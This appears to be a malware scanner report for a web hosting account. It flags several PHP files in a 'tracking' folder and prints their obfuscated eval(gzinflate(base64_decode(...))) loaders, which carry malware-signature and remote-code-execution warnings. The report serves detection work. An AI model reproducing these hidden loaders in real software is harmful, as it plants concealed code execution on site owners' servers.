RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbOK7w551z+h9YNVvZt7GdtNNpJ4nTzbSZ2Z7Tt9s0c+/ebh8f2aZttbLkleSkmW7/+wOApERJ1Itf2unMxnt26sgkCIIACIAAdeO7Xu+p78au4/7m+lMWzziLeBS5gX/jO/llEMVOGLfahze+u0HNR95yjI19PoIWTnjFJq7HoxvfhfxfSzfkg8Af8ZbtUkPeW8au113MFjZCMDd55Uxd34lhMGNDljSML13PDQYz7ox5SG0JK3fS+tuON/KO7rY/3fiOwUe0aFnPghHBPWCuP+YfsYuF4LEN/+jG8PVzfl5IBM8dhjizk2UcsCeu4/GQOf6Y/Rq4gM9PYeCMR04Um2aeYuuMBw70H4yp/4Da9gAy/gD/DCZLfxSls1BL4aVr8eQnFgzf81F847ud8ZD1geaX8JAWY+oFQ8djO69PH798/eTpi1/OTFACABM...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbOK7w551z+h9YNVvZt7GdtNNpJ4nTzbSZ2Z7Tt9s0c+/ebh8f2aZttbLkleSkmW7/+wOApERJ1Itf2unMxnt26sgkCIIACIAAdeO7Xu+p78au4/7m+lMWzziLeBS5gX/jO/llEMVOGLfahze+u0HNR95yjI19PoIWTnjFJq7HoxvfhfxfSzfkg8Af8ZbtUkPeW8au113MFjZCMDd55Uxd34lhMGNDljSML13PDQYz7ox5SG0JK3fS+tuON/KO7rY/3fiOwUe0aFnPghHBPWCuP+YfsYuF4LEN/+jG8PVzfl5IBM8dhjizk2UcsCeu4/GQOf6Y/Rq4gM9PYeCMR04Um2aeYuuMBw70H4yp/4Da9gAy/gD/DCZLfxSls1BL4aVr8eQnFgzf81F847ud8ZD1geaX8JAWY+oFQ8djO69PH798/eTpi1/OTFACABM...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/referrer_dynjs.php

Size: 48.31 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAMx9a3fbxrXo53St/gcS9ZEAc0SRdpLTgB6xfiZuHTuJnSY9FK0FkSCFGAQYANTDIvvb737MDAYPyk7vuWtdtxEBzHtmz37N3nv+/Kcs/H0TZeFZmsxC9zBKZvFmHh5viijury/Wh97oz386Pu48e/n28ZNXzztPHz/97vmf/3QRBvMwc52naVKESXFU3KxDvxOs13E0C4ooTY6vj34LLoN8lkXrwsFKTJFgdhEeYcEsjf1Okh7N8IvorDZ5cZSFl0EczYMirBR6fr2GPuZ+521QiM6Drzt/38Sd4Tff/Hdn8JU/GMD/O99+/46K/PlP0cLtRnkeFu69s5+e//jz87fvJoezs2h+OPW8P//p9s9/6sC/8Qn/wuCStIPJ/P5oDMP+8592YZyHKuu9WbpaB8kN5OnITqPSkcqVbFbnYZZDliDLghvX0wmLKDmDxGbCDIacrs72Fiyu4NvPsBS+vwyLsyCOz4qrKI5SXcT...

Exploit execution Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAMx9a3fbxrXo53St/gcS9ZEAc0SRdpLTgB6xfiZuHTuJnSY9FK0FkSCFGAQYANTDIvvb737MDAYPyk7vuWtdtxEBzHtmz37N3nv+/Kcs/H0TZeFZmsxC9zBKZvFmHh5viijury/Wh97oz386Pu48e/n28ZNXzztPHz/97vmf/3QRBvMwc52naVKESXFU3KxDvxOs13E0C4ooTY6vj34LLoN8lkXrwsFKTJFgdhEeYcEsjf1Okh7N8IvorDZ5cZSFl0EczYMirBR6fr2GPuZ+521QiM6Drzt/38Sd4Tff/Hdn8JU/GMD/O99+/46K/PlP0cLtRnkeFu69s5+e//jz87fvJoezs2h+OPW8P//p9s9/6sC/8Qn/wuCStIPJ/P5oDMP+8592YZyHKuu9WbpaB8kN5OnITqPSkcqVbFbnYZZDliDLghvX0wmLKDmDxGbCDIa...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAMx9a3fbxrXo53St/gcS9ZEAc0SRdpLTgB6xfiZuHTuJnSY9FK0FkSCFGAQYANTDIvvb737MDAYPyk7vuWtdtxEBzHtmz37N3nv+/Kcs/H0TZeFZmsxC9zBKZvFmHh5viijury/Wh97oz386Pu48e/n28ZNXzztPHz/97vmf/3QRBvMwc52naVKESXFU3KxDvxOs13E0C4ooTY6vj34LLoN8lkXrwsFKTJFgdhEeYcEsjf1Okh7N8IvorDZ5cZSFl0EczYMirBR6fr2GPuZ+521QiM6Drzt/38Sd4Tff/Hdn8JU/GMD/O99+/46K/PlP0cLtRnkeFu69s5+e//jz87fvJoezs2h+OPW8P//p9s9/6sC/8Qn/wuCStIPJ/P5oDMP+8592YZyHKuu9WbpaB8kN5OnITqPSkcqVbFbnYZZDliDLghvX0wmLKDmDxGbCDIa...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_ad_logs.php

Size: 8.88 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09/XPbNrI/JzP5H2DWDaWJvpy767SyJT/XdtrM5JKc7bTvnpPRUCJkMaZIlYT80dT/+9tdgN8gRclx096V08YSuF9YLBYLYAE9edztvvQc4VjOr453wcSMs5CHoeN7Tx6rD6NQWIFoNHefPH4C4Ed86ngRrGfNOfOnbGFd8CePt/EPGzDDskfWUvgj27FcHhgK86U3cZc2onp8ArSt4JZNHZeHTx4H/JelE/CR7014w3QIkHeXwnE7i9nCRN56kLfWheNZAsTUArIYUFw7ruOPZtyyeUCwJJUzbfzPtjtx9543Pz15zOCREA3jlT8hun3meDa/QRQDySMMv3EEfLzL1wtV4jrjAGt2AApgR6QAZnk2+8l3QJ7vA9+yJ1YodDVPpM0qcESwXaCML+DPaLr0JmFSi6gR3aQVj75n/vgjnwhoFnsMjeLxayikZrxw/bHlsu2T48M3J0cvX/9wqqPiA5mAKdgrK3CsMUg...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbNrI/JzP5H2DWDaWJvpy767SyJT/XdtrM5JKc7bTvnpPRUCJkMaZIlYT80dT/+9tdgN8gRclx096V08YSuF9YLBYLYAE9edztvvQc4VjOr453wcSMs5CHoeN7Tx6rD6NQWIFoNHefPH4C4Ed86ngRrGfNOfOnbGFd8CePt/EPGzDDskfWUvgj27FcHhgK86U3cZc2onp8ArSt4JZNHZeHTx4H/JelE/CR7014w3QIkHeXwnE7i9nCRN56kLfWheNZAsTUArIYUFw7ruOPZtyyeUCwJJUzbfzPtjtx9543Pz15zOCREA3jlT8hun3meDa/QRQDySMMv3EEfLzL1wtV4jrjAGt2AApgR6QAZnk2+8l3QJ7vA9+yJ1YodDVPpM0qcESwXaCML+DPaLr0JmFSi6gR3aQVj75n/vgjnwhoFnsMjeLxayikZrxw/bH...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbNrI/JzP5H2DWDaWJvpy767SyJT/XdtrM5JKc7bTvnpPRUCJkMaZIlYT80dT/+9tdgN8gRclx096V08YSuF9YLBYLYAE9edztvvQc4VjOr453wcSMs5CHoeN7Tx6rD6NQWIFoNHefPH4C4Ed86ngRrGfNOfOnbGFd8CePt/EPGzDDskfWUvgj27FcHhgK86U3cZc2onp8ArSt4JZNHZeHTx4H/JelE/CR7014w3QIkHeXwnE7i9nCRN56kLfWheNZAsTUArIYUFw7ruOPZtyyeUCwJJUzbfzPtjtx9543Pz15zOCREA3jlT8hun3meDa/QRQDySMMv3EEfLzL1wtV4jrjAGt2AApgR6QAZnk2+8l3QJ7vA9+yJ1YodDVPpM0qcESwXaCML+DPaLr0JmFSi6gR3aQVj75n/vgjnwhoFnsMjeLxayikZrxw/bH...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_ajax.php

Size: 11.57 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO098XvbtrE/J9+X/wHV9Cp5lS03W7fVsZ25ttO6c+Isdrp1Xj6FFiGLCUVqJBXbXfu/v7sDQIIkAFKynW7vhVtjmwQOh8Ph7nA4HB49HP720UP2W3Y2DVI2CULOroIwZFMv8uH3bAr/een7FH7zMnYVL0KfXXDmxxFnHwKPjZM4Yu/iC4QxfPRwODzlkR9El+zx5iY7+QtLeDqPo5Q/ejjlns+Tfu+7s7OXwy83vpQlemtPHj3EikdRkAVe8BNWxmZTnqZBHD16KH8ZpZmXZP2i+DhcUEsRH0MJL7kh9NNHDxP+r0WQ8FEcjXm/F1BBPlxkQbgxn86pQXORl95lEHkZNGYsyPKCGdAoiEeiS1S2hhV2IQwuEsRrb5HF7CDwQp4woCv7IQ4A2jdJ7PljL81MeBdtef7Ig/ojn+qPqOwQIOMH+DGaLKJxWuBAWEzEuHhj7Aube4k3YzC8Kc9YELFFEj56GExYP0jhTb8...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO098XvbtrE/J9+X/wHV9Cp5lS03W7fVsZ25ttO6c+Isdrp1Xj6FFiGLCUVqJBXbXfu/v7sDQIIkAFKynW7vhVtjmwQOh8Ph7nA4HB49HP720UP2W3Y2DVI2CULOroIwZFMv8uH3bAr/een7FH7zMnYVL0KfXXDmxxFnHwKPjZM4Yu/iC4QxfPRwODzlkR9El+zx5iY7+QtLeDqPo5Q/ejjlns+Tfu+7s7OXwy83vpQlemtPHj3EikdRkAVe8BNWxmZTnqZBHD16KH8ZpZmXZP2i+DhcUEsRH0MJL7kh9NNHDxP+r0WQ8FEcjXm/F1BBPlxkQbgxn86pQXORl95lEHkZNGYsyPKCGdAoiEeiS1S2hhV2IQwuEsRrb5HF7CDwQp4woCv7IQ4A2jdJ7PljL81MeBdtef7Ig/ojn+qPqOwQIOMH+DGaLKJxWuBAWEzEuHh...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO098XvbtrE/J9+X/wHV9Cp5lS03W7fVsZ25ttO6c+Isdrp1Xj6FFiGLCUVqJBXbXfu/v7sDQIIkAFKynW7vhVtjmwQOh8Ph7nA4HB49HP720UP2W3Y2DVI2CULOroIwZFMv8uH3bAr/een7FH7zMnYVL0KfXXDmxxFnHwKPjZM4Yu/iC4QxfPRwODzlkR9El+zx5iY7+QtLeDqPo5Q/ejjlns+Tfu+7s7OXwy83vpQlemtPHj3EikdRkAVe8BNWxmZTnqZBHD16KH8ZpZmXZP2i+DhcUEsRH0MJL7kh9NNHDxP+r0WQ8FEcjXm/F1BBPlxkQbgxn86pQXORl95lEHkZNGYsyPKCGdAoiEeiS1S2hhV2IQwuEsRrb5HF7CDwQp4woCv7IQ4A2jdJ7PljL81MeBdtef7Ig/ojn+qPqOwQIOMH+DGaLKJxWuBAWEzEuHh...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/intl_tone.php

Size: 1.74 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1XbW/bNhD+bsD/gSW8yMJsy862rk0seamtNRmWl1lK+6ENBFlibKKyqElUXpD4v+9ISRb9knZvggFb5N1zx7vn7uhmIyV/5jQlHosD0tZoHER5SIyc06iXLBJNP242FsQPSdrWxizmJOZd/piQI8TJAzcelpEUMQw0OXNO3v1uo/HJ+NReK+GxHyxIV6imLDpCMesGYqWDlnnGuym58yMa+pxg/RgByqnrXhmD3qAGsB8S8C87Qo7PO+jwNfotj9Dg7dufUf+no34fPuj9uVuqTwAJ0RjxBUGJn/FmoxXOkIlico8m79rCVVgKWHzr0RDWW97U/uPadtxPWrmo3RQyy+SHPI2ESDjrWnPCP/jgDI155IXUjziLiQcCeA25TPz4cQ+qXC9R6W1bkXxlYqw3G0/NBoKnlRHOaTzPFJvjQtYpd1RlYXdVYdb2WKLdmCYeYP1JbApgeovaWT7LeKoKutpNB/UhoDoyTYS...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XbW/bNhD+bsD/gSW8yMJsy862rk0seamtNRmWl1lK+6ENBFlibKKyqElUXpD4v+9ISRb9knZvggFb5N1zx7vn7uhmIyV/5jQlHosD0tZoHER5SIyc06iXLBJNP242FsQPSdrWxizmJOZd/piQI8TJAzcelpEUMQw0OXNO3v1uo/HJ+NReK+GxHyxIV6imLDpCMesGYqWDlnnGuym58yMa+pxg/RgByqnrXhmD3qAGsB8S8C87Qo7PO+jwNfotj9Dg7dufUf+no34fPuj9uVuqTwAJ0RjxBUGJn/FmoxXOkIlico8m79rCVVgKWHzr0RDWW97U/uPadtxPWrmo3RQyy+SHPI2ESDjrWnPCP/jgDI155IXUjziLiQcCeA25TPz4cQ+qXC9R6W1bkXxlYqw3G0/NBoKnlRHOaTzPFJvjQtYpd1RlYXdVYdb2WKLdmCY...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XbW/bNhD+bsD/gSW8yMJsy862rk0seamtNRmWl1lK+6ENBFlibKKyqElUXpD4v+9ISRb9knZvggFb5N1zx7vn7uhmIyV/5jQlHosD0tZoHER5SIyc06iXLBJNP242FsQPSdrWxizmJOZd/piQI8TJAzcelpEUMQw0OXNO3v1uo/HJ+NReK+GxHyxIV6imLDpCMesGYqWDlnnGuym58yMa+pxg/RgByqnrXhmD3qAGsB8S8C87Qo7PO+jwNfotj9Dg7dufUf+no34fPuj9uVuqTwAJ0RjxBUGJn/FmoxXOkIlico8m79rCVVgKWHzr0RDWW97U/uPadtxPWrmo3RQyy+SHPI2ESDjrWnPCP/jgDI155IXUjziLiQcCeA25TPz4cQ+qXC9R6W1bkXxlYqw3G0/NBoKnlRHOaTzPFJvjQtYpd1RlYXdVYdb2WKLdmCY...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_contactlist_add.php

Size: 22.12 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19+3fbuNHoz91z9n9AtG4oN5ZkO69dv1LHznZ9v2STxnH39ktzdSgRtphQpEpSdtw0//udGQAk+JL4UuxtjdNuLBIcDAbAYGYwM/j+u8HgxLVD27T/ZbsXLJxwFvAgsD33++/kH8MgNP2wu777/XffQ/Vjfm67qq5rTjnzztnMvODff7eG/7B91jGt4dhzQ3McOnYQduSXJ+7YmVv4qcvHANv0r9m57fDg++98/s+57fOh545517CpIh/MQ9vpzyYzA9vOr/LGvLBdMwQ0cyuyqGJ4ZTu2N5xw0+I+1SWs7PPun9ecsbO3vf7l++8YFFGj23npjQnuDrNdi3/GTzoIHuvwz3YIf35N9wtJ4tgjH3t2OA89dmybDveZ6Vrsb54N+Dz3PdMam0GY1/MYWyCgCd8PLfp+SHUHABlfwD/D87k7DuJeqEF04lE8fs680Uc+DhmMizWCUXH5FTyNxjHxhQef+OzC8Uamwy5...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19+3fbuNHoz91z9n9AtG4oN5ZkO69dv1LHznZ9v2STxnH39ktzdSgRtphQpEpSdtw0//udGQAk+JL4UuxtjdNuLBIcDAbAYGYwM/j+u8HgxLVD27T/ZbsXLJxwFvAgsD33++/kH8MgNP2wu777/XffQ/Vjfm67qq5rTjnzztnMvODff7eG/7B91jGt4dhzQ3McOnYQduSXJ+7YmVv4qcvHANv0r9m57fDg++98/s+57fOh545517CpIh/MQ9vpzyYzA9vOr/LGvLBdMwQ0cyuyqGJ4ZTu2N5xw0+I+1SWs7PPun9ecsbO3vf7l++8YFFGj23npjQnuDrNdi3/GTzoIHuvwz3YIf35N9wtJ4tgjH3t2OA89dmybDveZ6Vrsb54N+Dz3PdMam0GY1/MYWyCgCd8PLfp+SHUHABlfwD/D87k7DuJeqEF04lE8fs680Uc...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19+3fbuNHoz91z9n9AtG4oN5ZkO69dv1LHznZ9v2STxnH39ktzdSgRtphQpEpSdtw0//udGQAk+JL4UuxtjdNuLBIcDAbAYGYwM/j+u8HgxLVD27T/ZbsXLJxwFvAgsD33++/kH8MgNP2wu777/XffQ/Vjfm67qq5rTjnzztnMvODff7eG/7B91jGt4dhzQ3McOnYQduSXJ+7YmVv4qcvHANv0r9m57fDg++98/s+57fOh545517CpIh/MQ9vpzyYzA9vOr/LGvLBdMwQ0cyuyqGJ4ZTu2N5xw0+I+1SWs7PPun9ecsbO3vf7l++8YFFGj23npjQnuDrNdi3/GTzoIHuvwz3YIf35N9wtJ4tgjH3t2OA89dmybDveZ6Vrsb54N+Dz3PdMam0GY1/MYWyCgCd8PLfp+SHUHABlfwD/D87k7DuJeqEF04lE8fs680Uc...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/handle_incoming_sms.php

Size: 1.80 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAMVXW2/TShB+R+p/GFYRsU+dhJY3SoLS1NBA2pTYBSGoVo69SVbYXmOvCRX0v5/x3c4FcvpyolZOdq47l2/GR09C9j3mIaPCt5nS5r7txg7r2cJf8GU3WAVt9exoD5Mz/wuDwcIf3GZRz1xzl4uS++hJy5lDH3y2hotzJTnq9SIv4n76femKueVCa6aPprOL8fVbI5XhC1CeMi+Q90qLzvQPt7phqir8OnoC+GmhPJ0L5x71luQv7XM8ad+d5TyLUHhN+hs8qehSIDUOXYfZwmFKjc8U7bvM9YSx17u0fMdlMA1kh/vw7Fn6TcSycEZ6MjHkzDsDO46k8PSfzI4lU4ihT/SRCf/Am9n0CiyHWs6POcWAS8uW1OWRjODTpT7TQQSS+9SPvTkLUdlrouZ+JpGI4nkkw00XNXiuwakK/T6Q4xOiZvzV3fZJnWqA5y7zt+4MHTgp7DI3YodqPDlIYxqozoDlwbHC0MLsSqG...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAMVXW2/TShB+R+p/GFYRsU+dhJY3SoLS1NBA2pTYBSGoVo69SVbYXmOvCRX0v5/x3c4FcvpyolZOdq47l2/GR09C9j3mIaPCt5nS5r7txg7r2cJf8GU3WAVt9exoD5Mz/wuDwcIf3GZRz1xzl4uS++hJy5lDH3y2hotzJTnq9SIv4n76femKueVCa6aPprOL8fVbI5XhC1CeMi+Q90qLzvQPt7phqir8OnoC+GmhPJ0L5x71luQv7XM8ad+d5TyLUHhN+hs8qehSIDUOXYfZwmFKjc8U7bvM9YSx17u0fMdlMA1kh/vw7Fn6TcSycEZ6MjHkzDsDO46k8PSfzI4lU4ihT/SRCf/Am9n0CiyHWs6POcWAS8uW1OWRjODTpT7TQQSS+9SPvTkLUdlrouZ+JpGI4nkkw00XNXiuwakK/T6Q4xOiZvzV3fZJnWqA5y7zt+4...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAMVXW2/TShB+R+p/GFYRsU+dhJY3SoLS1NBA2pTYBSGoVo69SVbYXmOvCRX0v5/x3c4FcvpyolZOdq47l2/GR09C9j3mIaPCt5nS5r7txg7r2cJf8GU3WAVt9exoD5Mz/wuDwcIf3GZRz1xzl4uS++hJy5lDH3y2hotzJTnq9SIv4n76femKueVCa6aPprOL8fVbI5XhC1CeMi+Q90qLzvQPt7phqir8OnoC+GmhPJ0L5x71luQv7XM8ad+d5TyLUHhN+hs8qehSIDUOXYfZwmFKjc8U7bvM9YSx17u0fMdlMA1kh/vw7Fn6TcSycEZ6MjHkzDsDO46k8PSfzI4lU4ihT/SRCf/Am9n0CiyHWs6POcWAS8uW1OWRjODTpT7TQQSS+9SPvTkLUdlrouZ+JpGI4nkkw00XNXiuwakK/T6Q4xOiZvzV3fZJnWqA5y7zt+4...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_contactlist_download_template.php

Size: 515.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAHWPW0/CQBCF30n6HyaNCZgMUBDFlOAN8UmRBBOjL2RpB7qx3d10pwL/3i2UeJ+ns2fPzDfj1RISMeUNf6QVk+Imbw2FIIxJZSRYatWO7Lt/PPB+JW+lNdrKMuMamEWUZM4fwFKmpERGQx9a4It4HrkOEbGdW5GZlFo/J05zscpECEo3IzeFvn2ON0bmZEMIdrZXO9IFwxCW2pBq1E1iwnbbWabgOkJ9XS9TlxfTRCuCSZEtKEe4KaxUZC2UewHeydwyTHb6XlQSYZwJmcJ1HOdlFCuBI8lbwBkLdplXaQCfaeEOJ6/WOT3rdLvdE1f4sIXZ7j5YVDRksoyFdRuU6oo21f06wydnHFA4oTW86PztU3SCIOhgwlxe96XPIfv9ktdz9Reyyu6p1eN/8K1grfAxkRp7vX5wfiCutF7t8x/LhhjqIgIAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWPW0/CQBCF30n6HyaNCZgMUBDFlOAN8UmRBBOjL2RpB7qx3d10pwL/3i2UeJ+ns2fPzDfj1RISMeUNf6QVk+Imbw2FIIxJZSRYatWO7Lt/PPB+JW+lNdrKMuMamEWUZM4fwFKmpERGQx9a4It4HrkOEbGdW5GZlFo/J05zscpECEo3IzeFvn2ON0bmZEMIdrZXO9IFwxCW2pBq1E1iwnbbWabgOkJ9XS9TlxfTRCuCSZEtKEe4KaxUZC2UewHeydwyTHb6XlQSYZwJmcJ1HOdlFCuBI8lbwBkLdplXaQCfaeEOJ6/WOT3rdLvdE1f4sIXZ7j5YVDRksoyFdRuU6oo21f06wydnHFA4oTW86PztU3SCIOhgwlxe96XPIfv9ktdz9Reyyu6p1eN/8K1grfAxkRp7vX5wfiCutF7t8x/LhhjqIgIAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWPW0/CQBCF30n6HyaNCZgMUBDFlOAN8UmRBBOjL2RpB7qx3d10pwL/3i2UeJ+ns2fPzDfj1RISMeUNf6QVk+Imbw2FIIxJZSRYatWO7Lt/PPB+JW+lNdrKMuMamEWUZM4fwFKmpERGQx9a4It4HrkOEbGdW5GZlFo/J05zscpECEo3IzeFvn2ON0bmZEMIdrZXO9IFwxCW2pBq1E1iwnbbWabgOkJ9XS9TlxfTRCuCSZEtKEe4KaxUZC2UewHeydwyTHb6XlQSYZwJmcJ1HOdlFCuBI8lbwBkLdplXaQCfaeEOJ6/WOT3rdLvdE1f4sIXZ7j5YVDRksoyFdRuU6oo21f06wydnHFA4oTW86PztU3SCIOhgwlxe96XPIfv9ktdz9Reyyu6p1eN/8K1grfAxkRp7vX5wfiCutF7t8x/LhhjqIgIAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/invoice.php

Size: 6.02 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1cbVfbxhL+7JyT/7BVfWI7wTYmlLYQaBMwDbchoeC0p+VydIS1BjWy5EpyKEn573dmX6RdadeWSdJPlxMClmafnZ2X3ZnZXR4+aCT0r3mQUDeOxrTdCqJxOPdpf54FYW92PWt1dh6WaBxJ41/2xmFAowwJnSWE8XTmRbc1KIPofRyMaU5ZoiU57Tj00hTJpl4Q0oQ1KCOXqSnSZnQ6C72MpnmTZjrNZu48pUnkTSnZJU3/srt3RbNfvaTtaC8597zBDCBv4sQ3NpAv5SCuwvjSC0nz7Gg0dF8/Px4iTjBpFw++2nWcDjwk8NVMg4y6khutDQ1TaqJy9r0wJKPEG78LoiuH9wodpPPLNEvaTfdsePrr8PTceTkanbgv35yNnIu19bXNzu6uc3Nz0yv6vo7TDAAXNtxcg3chjcyvu5udTplXgWqk58xKEuc6y2bb/b7TY0960JObUNAZmkpfNZA1x1nLAVtn+6dHJyM...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1cbVfbxhL+7JyT/7BVfWI7wTYmlLYQaBMwDbchoeC0p+VydIS1BjWy5EpyKEn573dmX6RdadeWSdJPlxMClmafnZ2X3ZnZXR4+aCT0r3mQUDeOxrTdCqJxOPdpf54FYW92PWt1dh6WaBxJ41/2xmFAowwJnSWE8XTmRbc1KIPofRyMaU5ZoiU57Tj00hTJpl4Q0oQ1KCOXqSnSZnQ6C72MpnmTZjrNZu48pUnkTSnZJU3/srt3RbNfvaTtaC8597zBDCBv4sQ3NpAv5SCuwvjSC0nz7Gg0dF8/Px4iTjBpFw++2nWcDjwk8NVMg4y6khutDQ1TaqJy9r0wJKPEG78LoiuH9wodpPPLNEvaTfdsePrr8PTceTkanbgv35yNnIu19bXNzu6uc3Nz0yv6vo7TDAAXNtxcg3chjcyvu5udTplXgWqk58xKEuc6y2bb/b7...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1cbVfbxhL+7JyT/7BVfWI7wTYmlLYQaBMwDbchoeC0p+VydIS1BjWy5EpyKEn573dmX6RdadeWSdJPlxMClmafnZ2X3ZnZXR4+aCT0r3mQUDeOxrTdCqJxOPdpf54FYW92PWt1dh6WaBxJ41/2xmFAowwJnSWE8XTmRbc1KIPofRyMaU5ZoiU57Tj00hTJpl4Q0oQ1KCOXqSnSZnQ6C72MpnmTZjrNZu48pUnkTSnZJU3/srt3RbNfvaTtaC8597zBDCBv4sQ3NpAv5SCuwvjSC0nz7Gg0dF8/Px4iTjBpFw++2nWcDjwk8NVMg4y6khutDQ1TaqJy9r0wJKPEG78LoiuH9wodpPPLNEvaTfdsePrr8PTceTkanbgv35yNnIu19bXNzu6uc3Nz0yv6vo7TDAAXNtxcg3chjcyvu5udTplXgWqk58xKEuc6y2bb/b7...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_contactlist_edit.php

Size: 6.53 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

